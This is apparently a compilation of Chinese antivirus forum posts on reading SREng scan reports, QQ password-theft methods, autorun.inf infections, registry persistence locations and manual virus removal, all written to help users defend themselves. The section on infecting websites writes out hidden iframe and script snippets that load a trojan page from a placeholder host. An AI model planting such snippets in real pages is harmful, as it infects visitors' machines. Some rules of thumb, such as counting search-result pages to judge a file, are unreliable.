对如何分析SREng扫描报告的个人见解
解读报告的判断要点：
PS:下面的X是指盘符


1.熟悉各个正常的系统进程以及DLL文件（包括字母的顺序），需要强记于心。依据文件名判断

a.系统进程：
X:\WINDOWS\System32\smss.exe

X:\WINDOWS\system32\csrss.exe-----注意此项是否出现多余的字母

X:\WINDOWS\system32\winlogon.exe

X:\WINDOWS\system32\services.exe-----注意此进程的最后个字母是“S”

X:\WINDOWS\system32\lsass.exe

X:\WINDOWS\System32\svchost.exe-----此项进程尤为重要,但可能被病毒文件调用或者感染．

例：病毒进程X:\WINDOWS\System32\svchosts.exe 注意后面多了个“S”

X:\WINDOWS\System32\alg.exe

X:\WINDOWS\Explorer.EXE

X:\WINDOWS\system32\spoolsv.exe

X:\WINDOWS\system32\ctfmon.exe-----此项进程应该注意字母的顺序，发现有病毒进程伪装此进程.

例：病毒进程X:\WINDOWS\system32\ctfnom.exe 注意M和N的顺序

X:\WINDOWS\system32\nvsvc32.exe

X:\WINDOWS\system32\rundll32.exe---此项进程最易被病毒调用，但其也是一个很重要的进程很多程序都需要调用这个进程。

例：病毒进程X:\WINDOWS\system32\rundl132.exe----注意1和L的区别

X:\WINDOWS\system32\wdfmgr.exe----任务管理器的进程

X:\WINDOWS\system32\wuauclt.exe----系统自动升级的进程

X:\Program Files\Internet Explorer\iexplore.exe

此进程经常被病毒伪装
例：X:\Program Files\Internet Explorer\iexp1ore.exe 注意L和1的区别
    X:\Program Files\Internet Explorer\webm\iexplore.exe文件夹都变了，肯定有问题！

X:\WINDOWS\system32\wbem\wmiprvse.exe--用于通过WinMgmt.exe程序处理WMI操作


b.正常的文件：
X:\Program Files\Unlocker\UnlockerAssistant.exe----强制删除工具UNLOCKER的程序

X:\WINDOWS\system32\drivers\klif.sys

X:\WINDOWS\system32\drivers\kl1.sys----上面2项是卡巴的文件


X:\WINDOWS\system32\drivers\EagleNT.sys----安博士驱动文件

X:\WINDOWS\system32\klogon.dll><Intel Corporation>----卡巴的文件

X:\WINDOWS\system32\userinit.exe,----注意后面一定有逗号.

X:\WINDOWS\System32\hidserv.dll><N/A>----重要的系统文件

X:\WINDOWS\system32\drivers\klif.sys

X:\系统应用\瑞星杀毒\ExpScan.sys>----瑞星的文件

X:\WINDOWS\system32\shdocvw.dll----重要的系统文件

X:\系统应用\瑞星杀毒\HookReg.sys>----瑞星正常的文件

rpcapd.exe----联网的程序之一

X:\WINDOWS\System32\Drivers\sptd.sys><N/A>

X:\WINDOWS\system32\Mshtml.dll

X:\Program Files\Common Files\System\msadc\msadco.dll

X:\WINDOWS\system32\wmpdxm.dll

X:\WINDOWS\system32\wmp.dll

X:\WINDOWS\system32\Macromed\Flash\Flash9b.ocx----Flash按钮文件

<system32DRIVERSWudfPf.sys><Microsoft Corporation>----运行的库文件,用于支持ASP.NET

<system32DRIVERSwudfrd.sys><Microsoft Corporation>----运行的库文件,用于支持ASP.NET

X:\WINDOWS\System32\Drivers\Wsdrv.sys

X:\Program Files\Wopti\GWIOPM.sys--优化大师里面的文件

X:\Program Files\SogouInput\Plugin\SgImeWord.dll

X:\soft\GMon.exe--Eyou上网计费客户端，用于局域网的用户登录收费网关访问公网。

X:\virus\Vcrmon.exe----(驱逐舰)杀毒软件监控程序。

X:\WINDOWS\System32\drivers\kmsinput.sys---QQ游戏的反外挂相关程序

X:\WINDOWS\system32\SYNCOR11.DLL

X:\WINDOWS\System32\Drivers\dtscsi.sys

X:\Program Files\WinPcap\rpcapd.exe----联网程序


Oreans32.sys----WindowsARP防火墙单机版的文件,这项极易造成误删，搜索得到的结果全是木马病毒，请注意

X:\program files\rising\rfw\rfwproxy.exe--瑞星防火墙程序，没通过数字验证的正常文件

X:\WINDOWS\SYSTEM32\DRIVERS\3WAREDRV.SYS

X:\WINDOWSSystem32\DRIVERS\3waregsm.sys

X:\WINDOWSSystem32\DRIVERS\3WDRV100.SYS

X:\WINDOWS\System32\ATSpy.sys----金山毒霸文件

X:\WINDOWS\system32\drivers\KRegEx.sys----金山毒霸文件

X:\WINDOWS\system32\DRIVERS\quakedrv.sys         

X:\WINDOWS\system32\drivers\dump_wmimmc.sys

[SmartLinkService / SLService][Running/Auto Start]
<slserv.exe>----调制解调器连接相关程序
     
X:\WINDOWS\fsp.exe>----联想系统中的文件           

X:\WINDOWS\usblogon.exe----联想系统中的文件

X:\WINDOWS\system32\drivers\kmsinput.sys----腾迅反外挂相关程序

X:\WINDOWS\system32\drivers\PnpWmkDrv.sys----完美卸载相关驱动文件

X:\Program Files\Wom\gwiopm.sys----优化大师相关驱动文件

X:\WINDOWS\domino.exe----摄像头驱动文件


PS：system32\DRIVERS\npf.sys这项不要删除，删除之后可能无法上网


c.常出现的病毒文件：

npkcrypt.sys(病毒驱动：npkycryp.sys 多了个字母Y)

IEINFO5.sys----69262病毒中常出现的病毒驱动

isignup.sys---木马驱动

sbfyrn.exe----木马群中的主要程序

severe.exe----木马群中的主要程序

上面2项是顽固病毒文件,时常难以删除,并伴随劫持映像(劫持文件随机命名，大小31k。可能是exe或com文件.)


2.依据进程或者文件的公司名字进行判断

这个也是最快的办法，大多数报告依照这个方法进程判断。如瑞星等等的杀毒软件的文件都有
公司的标识，下面是常见的正常公司的名字（需要记忆）：
[(Verified)Microsoft Corporation]--这种是通过数字签名的里面一般是正常文件,除了极个别的病毒文件也能通过数字验证.
[(Verified)N/A]----这种就有问题了,也许是正常文件但是没有公司属性，也有可能是病毒文件，需要自己判断．

正常的公司属性:

[北京紫光华宇软件股份有限公司, 5.0.0.5076]--紫光拼音的软件

[中文之星]

[Beijing Rising Technology Co., Ltd.] PS---常见的瑞星的目录\Rising\

<Autodesk, Inc.>

<Macrovision Corporation>

<Conexant>

<NVIDIA Corporation>--显卡驱动的公司

<Parallel Technologies, Inc.>

<Realtek Semiconductor Corporation>--声卡驱动的公司

<Adobe Systems Incorporated>

<VIA Technologies inc,.ltd>

[Kaspersky Lab]----卡巴斯基
<CMD Technology, Inc.><Intel Corporation>----英特尔公司

<LSI Logic Corporation.>

<Silicon Integrated Systems Corp.>

[奇虎网]--360安全卫士的网站

[Creative Technology Ltd, 1.0.1.0]----创新科技公司

<Jiangmin Co., Ltd.>--江民杀毒软件公司

<Protection Technology>


其实有些时候直接搜索文件不容易得到相关的信息，不过在搜索其公司之后会得出正确的判断。但是这样还有个弊端，有些病毒文件冒充<Macrovision Corporation>和Microsoft Corporation遇到这2个公司名的时候应百度下，不应该被伪装所麻痹！还有公司名是<N/A>的也需要仔细判断。


3.依据文件的路径进行判断
很多伪装的病毒文件和系统或者正常软件的名字是一样的，但是路径却不相同，如：
病毒文件路径：X:\Program FilesX:\Program Files\Internet\webm\iexplore.exe
本来正常的文件应该只在Internet下的但是却多了个webm的文件夹，所以肯定有问题。

4.依据文件夹判断
有些文件公司名是<N/A>或者没有的，应该根据其文件夹判断，象是瑞星的文件中就有这种，如
[X:\Program Files\Rising\Rav\SpamEng.dll] [N/A, 18, 0, 0, 6]
公司名字是没有的，只有通过文件夹判断！去搜索起文件夹即可。

补充：1.报告的开头有电脑系统的版本，如Windows XP Professional Service Pack 1 (Build 2600) 有些时候没解决问题 可要求其打SP2的补丁。
2.有些文件的是手工启动还是自动启动也是判断的方法之一。
3.有些文件经过以上的搜索之后没有得到相关的信息，如果看见崔老师的报告一定要进去看看
用来作为参考，并不一定要删除或者保留，要以自己的报告作为判断。
4.大多数病毒文件的公司都是<N/A>，应该引起注意！
5.rundl132.exe logo1_.exe是威金病毒的典型进程！
6.如果确实无法判断的话，可以请他把样本发上来进行检测。
7.确实无法判断的另外中方法，如果在百度中有7.8页的相关信息，就应该是正常的。反之，只有2.3页则文件肯定有问题。
8.安装Dreamweaver后，JS文件默认便是Dreamweaver打开了。（这时JS文件的关联是错误，可 以不用修复，这个是正常现象）
9.卡巴的80端口是web服务器上打开的，不是在自己的电脑上打开。
10.出现<KernelFaultCheck><%systemroot%\system32\dumprep 0 -k>  [N/A]的时候证明系统出过问题，这个服务是
向微软报错误日志的进程。
----------------------------------------------------------------
更新部分：
某类病毒驱动文件的一些特征
1.都是加载在X:\windows\system32\drivers下
2.百度搜索不到
3.没有通过微软签名认证

具体案例
1:延续了my123随机文件的一贯算法：
6位随机英文字母+2位数字。新发现一例:1个数字+3个英文字母+1个数字+3个英文字母

2:全数字
例如X:\WINDOWS\System32\drivers\81562.sys

3:8位随机英文字母
例如X:\WINDOWS\system32\drivers\ccajcdhi.sys

4:四位随机英文字母+下划线+随机英文字母
例如X:\WINDOWS\system32\drivers\gwcd_l.sys



插入进程的良民文件:
X:\WINDOWS\system32\msdmo.dll                  <Microsoft>
X:\WINDOWS\system32\imon.dll                    <NOD32>
X:\WINDOWS\System32\SYNCOR11.DLL      <SoundMAX>
X:\WINDOWS\system32\TcpIpDog.dll            <Drcom>
X:\WINDOWS\system32\EntApi.dll -              <Mcafee>
X:\WINDOWS\system32\uxtheme.dll            <Microsoft>
X:\WINDOWSsystem32\drivers\ADProt.sys--TX公司的广告驱动


使时间出错，从而使杀软失效的病毒程序：
[4559FDA2 / 4559FDA2][Stopped/Auto Start]
  <X:\WINDOWS\system32\D97A73FB.EXE -g><Microsoft Corporation>


2007年7月1日更新:
引自崔老的文章:
病毒在注册驱动项的时候没有用常见的方式直接将文件名写入VALUE而是用%s变量传递的方法。观察SRENG的日志，也会让人迷惑这丫的到底藏身在哪里？例如：
[yeaupu10 / yeaupu10][Stopped/Boot Start]
      <\SystemRoot\system32\\drivers\\system32\\drivers\\%s.sys.sys><N/A>
通过杀软的辅助提示信息，我们很容易就发现了真正的驱动文件还是在常见的 %systemroot%\system32\drivers 下，文件名为yeaupu10.sys。

文件关联

.TXT  Error. [C:\WINDOWS\system32\notep.exe %1]
.EXE  OK. ["%1" %*]
.COM  OK. ["%1" %*]
.PIF  OK. ["%1" %*]
.REG  OK. [regedit.exe "%1"]
.BAT  OK. ["%1" %*]
.SCR  OK. ["%1" /S]
.CHM  Error. ["hh.exe" %1]
.HLP  Error. [winhlp32.exe %1]
.INI  Error. [C:\WINDOWS\System32\NOTEPAD.EXE %1]
.INF  OK. [%SystemRoot%\System32\NOTEPAD.EXE %1]
.VBS  OK. [%SystemRoot%\System32\WScript.exe "%1" %*]
.JS  OK. [%SystemRoot%\System32\WScript.exe "%1" %*]
.LNK  OK. [{00021401-0000-0000-C000-000000000046}]
注意红色部分里面C:\WINDOWS\system32\notep.exe是病毒文件,造成文件关联错误,这类病毒极易看掉,请注意.

QQ盗号总的来说可分为3中盗号方式:1,本地破解.  2,利用木马,远程盗号. 3,网络钓鱼
好了,下面我来对这3种盗号方式,逐一讲解!
-------本地破解.既是利用黑客字典,进行暴力破解!这里我先在初略的讲解下QQ登陆的过程.在QQ客户端(也就是输入QQ号,密码的登陆筐)当你输入QQ号和密码后,QQ客户端客户端会把你输入的相关信息发送给QQ的服务器,当QQ的服务器收到你发送的过来请求登陆的信息后,会在数据库里查找相关信息看是否匹配,如果匹配,就进行确认,并允许登陆,如果不匹配,就会返回相关的不正确信息(如找不到此QQ号,或者密码错误等).当然为了安全起见,QQ客户端并不会真的发送你所填写的账号和密码,而先经过预先规定好的算法,进行计算,得到一个值,发送给服务器,然后服务器在经过那个算法,把这个值还原,在查找数据库.好了,了解QQ登陆的过程,我们在来看下本地暴力破解的原理,其实就是就是利用事先制作好的黑客字典(这里的字典,不是我们一般所说的什么清华字典,而已纪录一串字符的文本文档,而这些字符里面,可能就有你的密码在其中)与服务器进行匹配对照,比如你的密码是123,那么首先对照111,不对!就对照112!不对,在对照113....依次下去,直到对照123,匹配,那么自然就知道你的密码是123了.看到这里,可能有的人就会想我把密码设长点,随便让他这样慢慢猜下去!但是你要知道计算机的计算速度是很快的,至于多快,自己可以去想下,反正一个8位数纯数字密码,P4的CPU只需要几个小时而已!那么如何防止破解呢??其实还是要加强密码强度,密码不光是数字,还要有字母和特殊字符.一个16位的数字+字母+特殊字符,学过排列组合的人自己可以去算下有多少种组合方式,足够黑客破解100年了的!

--------利用木马,远程盗号!这大概是目前最流行的盗号方式了.本地破解还耗时间,网络钓鱼对技术有一定要求!所以利用木马这个技术含量又低,操作又简单,收效又快的方法,自然得到许多人亲睐!当时利用木马的盗号方式也是五花八门,这里我主要介绍及格常见的盗号方式!
    1,最简单的,自然是直接把木马发送给别人,让别人点击运行木马!好在这世上象这么傻的人不多!那么盗号者自然会想其他的方法,用的最多的自然是社会工程学,简单的说就是利用别人一些好奇,贪欲等心里!比如把一个盗号木马和一个小游戏或视频,MP3等捆绑后,发给你(如通过QQ,或者邮箱),你要是一不小心,运行了.显示还是游戏或者视频,但是木马已经偷偷的在你机器上扎根了!所以不要轻易接受别人发送过来的东西,跟不要轻易点击运行
    2,现在都流行网站挂马!其实那些挂马的人真正是利用自己技术入侵网站在挂马的没几个,一般就是利用一些,现成的工具,或者网站公布的漏洞(象以前的DVBBSV7.0的上传漏洞就闹的比较凶).鄙视一些这些人先!至于如何入侵网站,不在本文讨论范围之内,我可以先提一下一般的方法就是利用上传漏洞,暴库,XSS攻击,SQL注入,旁注攻击等等
这里就不多说,一般在去得网站的WEBSHELL后,就实行挂马了.在挂马之前一般都需要有个可以访问空间,将一些QQ木马利用网页木马生成器,制作成网页木马,然后上传到自己的空间上去,这里假设空间是
www.xxx.com
.一般的挂马方式有一下几种,最简单,应用最广泛的就是框架挂马,即在一个网页里插入<iframe src="
http://www.xxx.com(网页木马的地址)" width=0 heigth=0></iframe>,当你访问这个网页的时候,同时就会访问
http://www.xxx.com这个网页,然后就中了木马!但是这很容易被发现.隐蔽一点的就属JS挂马了,先在一个记事本文档里写入document.write(<iframe src="
http://www.xxx.com(网页木马的地址)" width=0 heigth=0></iframe>),保存为XX.JS,然后在一网页里插入如下代码<script language="javascript" scr="
http://www.xxx.com/XX.js">,当你访问这个网页的时候,同时也会访问
http://www.xxx.com/XX.js的XX.JS文件,然后调用里面的代码,自然也就中了木马了!当然还有更隐蔽的,就是JS文件加密挂马,先在一个记事本文档里写入document.write(<iframe src="
http://www.xxx.com(网页木马的地址)" width=0 heigth=0></iframe>),保存为MM.jpg ,然后在一网页里插入如下代码<script language="jscript.Encode" scr="">,很具有迷惑性,一般的管理员很难发现,不过对高手来说,也不算什么!当然挂马的方式还有很多很多,这里只向大家介绍常用的几种,让大家了解一下!
从以上挂马的方式可以看出,要想挂马,必须首先要入侵网站.然后才能实行挂马的手段.而一些大型网站完全性自然要高很多,被挂马的几率也会小很多!所以建议大家养成良好的上网习惯,不要看见网页就点,特别是网页中的一些广告.也不要浏览一些不健康的网站,也不要随意亲信别人点别人发给你的网站,还有下载软件的时候,最好去一些大型站点如华军,天空等!最好不要在一些个人网站下什么东西!杀毒软件,防火墙是少不了的,关键是安全意识!
-------网络钓鱼.相信大家也见过不少.一般有些人,将一些门户网站的首页下载或者将整个站点下载下来,然后申请个很相似的域名,让下载下来的站点,上传到自己空间,然后等着别人去登陆,由于网站看起来一样(那是因为将整个网站就下载下来了,着对高说不算什么),域名也很相似,所以有些人就是以为是真的官方网站,然后就毫不犹豫的填写自己饿账号,密码.然后自己银行卡上的钱不翼而非飞,游戏的里人物被洗劫光光! 所以大家平时上官方网站的时候，要小心,看是否是真正的官方网站,要是别人告诉你的,就更要小心,仔细观察域名,有可能就是一个字母之差!

好了常见的QQ盗号方式就以上几种,当然还有其他方法,但是那都是需要高深的技术的,我相信具有那些的技术的人是不屑QQ盗号这种猥亵的行为的!
总结以上的防御方法,杀毒软件,防火墙不能少!杀毒软件国外就用卡巴,nod32的把!国内的就瑞星,金山等等!防火墙,天网个人版不错!当时安全意识最重要这是我一再强调的,要不然重然你的杀毒软件在牛B,你的机器一样是个毒窝子!不要亲信陌生人的消息,不要轻易点击陌生人发来的网址,不要接受并运行陌生人发来的软件!不要浏览一些不健康的网站,浏览一些个人网站和小型网站的时候,要小心(那些都是经常被挂马的对象).最好去大型的下载站点去下载软件!等等..这些习惯都要靠自己慢慢样成的
最后说一下中了病毒木马后怎么处理!首先断开网络,备份重要数据(非常重要)莫等数据丢失,在骂娘!然后进入安全模式下扫描杀毒!如果不行,准备DOS下的杀毒软件,在DOS下杀毒!
推荐一些比较好的安全工具,sreng,xdelbox,冰刃,windows清理助手,很不错,我经常用来手动杀毒,比杀毒软件要好用的多!当然想手工杀毒,先补习下一些系统知识和网络知识先~

这里告诉大家一个小技巧,就是在你输入密码的时候,看能不能复制,粘贴.如果可以的话,那就要注意,极有可能是中了木马!还有一般登陆QQ之前,用QQ医生扫一遍,如果QQ医生被异常屏蔽,一般也是木马所为,平时在输入密码的时候,观察一下每个*号字符是否紧密接连,如果中间有一些缝隙,也有可能是中了木马!(这些都是我的个人经验饿)

最后说下,QQ被盗,利用密码保护,把QQ找回来,然后修改密码,密码保护要是忘了就利用QQ申诉!
在不行的话,请尽量备份一份盗走你QQ的那个木马,发给我或者一些高手,看能不能进行反编译或嗅探找出盗你QQ的那个人,要回QQ(他要是不给,就不要怪我不客气了)

xnxlufi.exe病毒中毒症状：
会在C盘生产yyjnldu.exe和xnxlufi.exe两个文件，如：c:program filescommon filessystemyyjnldu.exe和c:program filescommon files micosoft sharedxnxlufi.exe。任务管理器中多了yyjnldu.exe和xnxlufi.exe两个进程，删除不掉。一删进程管理器就自动关闭。这个病毒中毒后的症状有关闭任何杀毒软件和杀毒辅助工具，包括360安全卫士，aurouns.exe这些工具统统关闭，而且想从任务管理器里结束掉它的话就会先关闭任务管理器。还有，打开任何包含杀毒，病毒等字样的窗口都会被自动关闭，包括浏览器，记事本。在DOS环境下也删除不掉在D盘E盘的文件，删除后就会自动产生。
木马，蠕虫

xnxlufi.exe病毒清除办法详解：
木马，蠕虫
都不行。怎么办？不过以外的被我发现qqkav.exe（QQ病毒木马专杀工具）在被关闭时会弹出确认关闭的对话框，就是询问是否要真的关闭它。这下就好办了，嘿嘿……被我找到突破口了。在qqkav.exe弹出对话框的时候，别管它，不要点否也不要点是。然后再打开一个qqkav.exe，这样就可以使用它了，首先在“进程管理”里把病毒进程yyjnldu.exe和xnxlufi.exe结束掉。然后就可以运行autoruns.exe把启动项里的病毒的启动项删除掉，这个工具在这里下载：
http://www.mxpc.cn/article.asp?id=289。然后就可运行杀毒软件和各种专杀工具了。下载AV终结者的专杀工具，扫描一遍系统，把所有病毒程序全部删除。重新启动，OK了，病毒间阎王去了。
反病毒，就这么简单

这个病毒还有一个影响就是将文件夹选项下的“隐藏受保护的系统文件（推荐）选项给去掉了，在这里教大家一个恢复的方法。
只要在HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion

ExplorerAdvancedFolderSuperHidden下，修改type为checkbox，确认CheckedValue和DefaultValue都为1，然后在HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache加入@shell32.dll,-30508为隐藏受保护的操作系统文件(推荐)即可。
病毒无所不在，反病毒网伴你安全冲浪
这里再次提醒大家应该关闭系统的自动播放功能,就是让autorun.inf不起作用。

症状:磁盘分区不能双击打开；
插入U盘导致感染病毒；
中了病毒后明明完全重装了系统（指格式化系统盘后重装 或者是ghost恢复 下同），但是病毒依然横行。本文将教你导致这些现象的原因，对应的防守策略及解决方法。
首先说说磁盘双击不能打开的原理吧
我们来做个实验，将一个可执行文件放在某个分区的根部录下。例子中是打字练习这个软件。然后我们打开记事本 然后输入
[autorun]
OPEN=打字软件.exe open=输入你的可执行文件的文件名
然后把它保存为名为Autorun.inf文件 也放在该分区的根目录下
接下来重启电脑，然后双击该分区，原本是要进入该分区的，但是却执行了你的可执行文件。在盘符上单击右键可以看到多了一个自动播放，如果该可执行文件是个病毒的话，那后果就是。
这就是磁盘分区不能双击打开；插入U盘导致感染病毒的原理。
可以看出Autorun.inf文件就是这类病毒的加载途径
有些网友会问 "我看不到有这个病毒呀" 那是因为病毒作者给该文件赋了隐藏属性。
接着网友又会问 "我也选择了显示所有文件呀" 病毒作者为了达到隐藏的目的，修改了注册表中显示隐藏文件的相关选项，使得你即使选择了显示所有文件，也无法达到显示隐藏文件的目的。这里作者提供了相关的修复显示隐藏文件的注册表修复文件供大家下载，点击下载，你下载并运行了该文件后就可以看到被隐藏的Autorun.inf文件了。
知道了原理，我们来防范此类病毒。
首选方法：组策略法
具体操作方法 开始→运行→输入gpedit.msc→确定→计算机机配置→管理模板→系统关闭自动播放→已启用→所有驱动器→确定 如图1
　　　 

这样做以后就不怕病毒通过Autorun.inf 自动播放这个功能来加载了。
第二种方法
在每个分区（U盘）的根目录下建立一个名为Autorun.inf的文件夹 是文件夹而不是文件哦。
这样做有个缺点 就是容易被病毒删除。于是我们可以利用文件名特性来在Autorun.inf的文件夹再建立建立一个不易删除的文件夹。
开始-程序-附件-命令提示符 输入 双引号里边的"md x:\autorun.inf\正常的免疫文件..\" 在实际中需把x替换成对应分区的盘符。
这里笔者已经做好了个批处理文件点击下载，你只需要解压后运行就可以直接完成以上步骤了，需要免疫U盘的话请在运行前插入U盘。
中了病毒明明完全重装了系统，但是病毒依然横行。那又是什么原因呢？
原因可能有
第一种情况
就是以上说的，虽然你完全重装了系统，但是其它分区的根目录下的Autorun.inf类病毒还没清除，所以你一双击进入其它分区，即导致重新感染病毒。
解决方法：完全重装系统后先不要进入其它分区，右键单击我的电脑→选搜索→选择所有文件和文件夹→再选择更多高级选项→勾选搜索隐藏文件和文件夹→文件名里填入Autorun.inf→然后按搜索→然后打开任意位于分区根目录下的Autorun.inf 并记录OPEN=xxx.exe 这个文件名→接下来回到搜索窗口→删除所有任意位于分区根目录下的Autorun.inf文件。
接着搜索刚刚记录的xxx.exe（文件名根据实际情况不同）的文件→删除所有任意位于分区根目录下的这些文件。笔者也做了个批量删除Autorun.inf的批处理，解压后运行就可以批量删除Autorun.inf文件了。点击下载
接着用上边所说的免疫方法为自己的系统做个防范吧
第二种情况
就是你所中的病毒会感染可执行文件和网页文件。有许多网友喜欢把常用软件的安装程序放在硬盘里，以方便重装系统后或者需要时能即时安装使用。
完全重装系统后第一时间就是安装或直接使用那些常用软件（比如杀毒软件，比如QQ），由于安装程序（可执行程序）已被感染，所以造成病毒重新被激活。
防范方法：为防止安装程序受到病毒感染，可以用压缩文件进行压缩打包，这样做既避免了这些程序感染病毒，又节约了磁盘空间。
解决方法：完全重装系统后，先不要安装或运行原硬盘里的任何程序，可以用光盘或U盘从别人的电脑里拷贝杀毒软件的安装程序过来→安装杀毒软件并升级到最新病毒库→然后用杀毒软件全盘查杀病毒。记住清除病毒过程中需要选择的是清除病毒，而不是删除病毒。清除病毒是指把病毒从正常程序里清除出去，而删除会直接把你的程序也一并删除了。
第三种情况
完全重装系统后由于你的系统没有打上安全补丁，一联网便遭到蠕虫类病毒的自动感染。
防范方法：1.使用360安全卫士为你的系统打上补丁后再安全上网
2.安装并升级杀毒软件并它的开启实时监控后再联网(升级杀毒软件用离线升级包)

仔细分析下，最近几年已经出现了越来越多的对抗杀毒软件以及检测工具扫描的病毒，他们会关闭甚至删除杀毒软件以及检测工具。一般用户很难判断他们藏在哪里，做了些什么。而这时杀毒软件以及安全工具确普遍无法运行......
　　本文主要列举说明一些常见抗杀软类病毒的需要注意的检测位置。
　　一：Run键值
　　典型病毒：AV终结者变种
　　目的现象：开机启动双进程坚守、关闭杀毒程序等。
　　检测位置：
　　HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
　　补充说明：该位置属于常规启动项，很多程序会写。
　　二：执行挂钩
　　典型病毒：大量恶意软件以及病毒均会写入
　　目的现象：杀毒软件难于清理、关闭杀毒程序等。
　　检测位置：
　　HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
　　补充说明：很少有正常程序会写入该位置，病毒几率非常大。典型例外：瑞星反病毒软件
　　三：Appinit_dlls
　　典型病毒：机器狗新变种、磁碟机变种。
　　目的现象：安全模式也加载、关闭杀毒程序等。
　　检测位置：
　　HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Appinit_Dlls
　　补充说明：很少有正常程序会写入该位置，病毒几率变态大。典型例外：AVG互联网安全套装
　　四：服务以及驱动：
　　典型病毒：灰鸽子变种
　　目的现象：难于发现与清理、关闭杀毒程序等。
　　检测位置：
　　HKLM\System\CurrentControlSet\Services
　　补充说明：病毒写入底层服务与rootkits驱动，导致清除困难。
　　五：映像劫持
　　典型病毒：大多数AV病毒均会写入此位置
　　目的现象：简单粗暴地让某个特定文件名的文件无法执行
　　检测位置：
　　HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
　　补充说明：被劫持的文件不一定是exe文件。如Papa在处理恐怖鸡感染号病毒时，为了防止ani.ani还原病毒主文件，便劫持ani.ani文件。
　　六：目前已知删除安全软件文件的检测位置
　　典型病毒：飘雪变种
　　目的现象：杀毒软件安装文件被删除、sreng改名后运行立即被删除等。
　　HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler
　　HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
　　补充说明：已知变种均会修改hosts文件、在QQ目录下写入隐藏的病毒dll并且修改API HOOH。
　　七：Boot.ini文件
　　典型病毒：磁碟机变种
　　目的现象：独占访问Boot.ini文件，导致未更新的grub重启删除工具失效。
　　检测位置：Boot.ini
　　补充说明：在Vista操作系统下对该项检测没有意义。
　　小结：
　　检测报告的分析工作需要具备常用软件以及操作系统丰富的使用经验，才可以比较迅速准确地定位到具体问题。本文仅将对抗杀
　　软类病毒常见的关注位置找出来供大家参考。其实还有很多病毒会加载的位置本文不做详述，请具体问题具体分析。
　　附件为PapaCheck检测工具v3.0 目前可以比较全面地检测到包括对抗杀毒软件、删除安全工具病毒在内的非感染型病毒的写入位置。
　　如在Vista下面使用时，需要右键单击该文件后点击“以管理员身份运行”。
　　注：在脚本运行时请阅读其中的免责信息。在检测的过程中有可能会提示“没有找到pkmws.dll，因此这个程序未能启动重新安装应用可能会修复此问题”点击“确定”即可。提示“插入软盘”，点击”“取消”即可。相关提示并不影响检测报告的生成。如果您没有执行扫描操作，按“CTRL+C”键终止或直接关闭了程序，则会在当前目录生成papa.com、papascan.bat、papawb.com、papashell.exe、papatask.exe这六个文件。相关文件释放与调用不会对您系统造成影响，检测结束后直接删除即可了!

2008年出现两大危害严重的病毒，一个就是病毒之王磁碟机，还有一个就是我们将要介绍的“新型AV终结者（Javqhc）”木马。在毒性上Javqhc木马一点不输给磁碟机，并且大有赶超之势，真是毒王之王毒穿肠~！~

中了Javqhc病毒木马有三个很明显的特征：

1、无法打开360安全卫士、顽固木马专杀大全，系统诊断工具，360U盘专杀，360机器狗专杀等安全软件，运行后被立刻删除。

2、该木马会修改hosts表，用户打开360安全卫士、卡巴斯基、金山、江民、瑞星、赛门铁克等安全厂商的升级服务器、主页、论坛的域名，均会被被劫持到假冒的百度或雅虎页面。

3、系统中qq安装目录下有wsock32.dll存在。Javqhc木马比之磁碟机，隐蔽性更高，一般极难被抓到样本。

病毒分析：病毒主要分为两部分，一部分位于系统目录下，路径为“c:\windows\system32\lkenu.yxr”，病毒用这个模块“lkenu.yxr”插入到通常的几个进程中（一般为explorer.exe,ctfmon.exe）但不会插入其它系统进程。这个模块“lkenu.yxr”模块非常顽固，用冰刃，syscheck，狙剑，JULY，killBox,Process Explorer,unlocker,PowerRmv,XDelBox，等内核级工具均无法删除，极为顽固。

病毒还有一部分位于QQ目录下，如QQ在D盘则病毒也在D盘，里面有两个病毒模块“wsock32.dll”+“iwndaq.dll”，当用户打开QQ的时候，病毒就会通过“wsock32.dll”这个模块被启动，“wsock32.dll”本身没有毒，道理同”Autorun.inf“打开病毒的原理。

这个病毒可恶之处在于，就算重装C盘，只要用户一打开位于其它盘的QQ，瞬间又会被重复感染。病毒在不断进行变种，危害相当严重。而且越来越难以清除，望广大网友千万要提高警惕~

下图 1-8 是病毒从感染到发作的全过程，通常不联网的电脑病毒只会潜伏，不会发作，一连网才会跳出来控制电脑，达到其不可告人的目地。

如发现有以上症状，请立即下载立即下载360新型AV终结者木马专杀工具 360安全卫士，带给你无处不在的贴身呵护~~~~

行杀死顽固病毒进程。

根据进程名查杀

这种方法是通过WinXP系统下的taskkill命令来实现的，在使用该方法之前，首先需要打开系统的进程列表界面，找到病毒进程所对应的具体进程名。

接着依次单击“开始→运行”命令，在弹出的系统运行框中，运行“cmd”命令；再在DOS命令行中输入“taskkill/imaaa”格式的字符串命令，单击回车键后，顽固的病毒进程“aaa”就被强行杀死了。比方说，要强行杀死“conime。exe”病毒进程，只要在命令提示符下执行“taskkill/imconime。exe”命令，要不了多久，系统就会自动返回结果。

根据进程号查杀

上面的方法，只对部分病毒进程有效，遇到一些更“顽固”的病毒进程，可能就无济于事了。此时你可以通过Win2000以上系统的内置命令——ntsd，来强行杀死一切病毒进程，因为该命令除System进程、SMSS。EXE进程、CSRSS。EXE进程不能“对付”外，基本可以对付其它一切进程。但是在使用该命令杀死病毒进程之前，需要先查找到对应病毒进程的具体进程号。

考虑到系统进程列表界面在默认状态下，是不显示具体进程号的，因此你可以首先打开系统任务管理器窗口，再单击“查看”菜单项下面的“选择列”命令，在弹出的设置框中，将“PID（进程标志符）”选项选中，单击“确定”按钮。返回到系统进程列表页面中后，你就能查看到对应病毒进程的具体PID了。

接着打开系统运行对话框，在其中运行“cmd”命令，在命令提示符状态下输入“ntsd-cq-pPID”命令，就可以强行将指定PID的病毒进程杀死了。例如，发现某个病毒进程的PID为“444”，那么可以执行“ntsd-cq-p444”命令，来杀死这个病毒进程。

QQ常见网络骗术攻防战
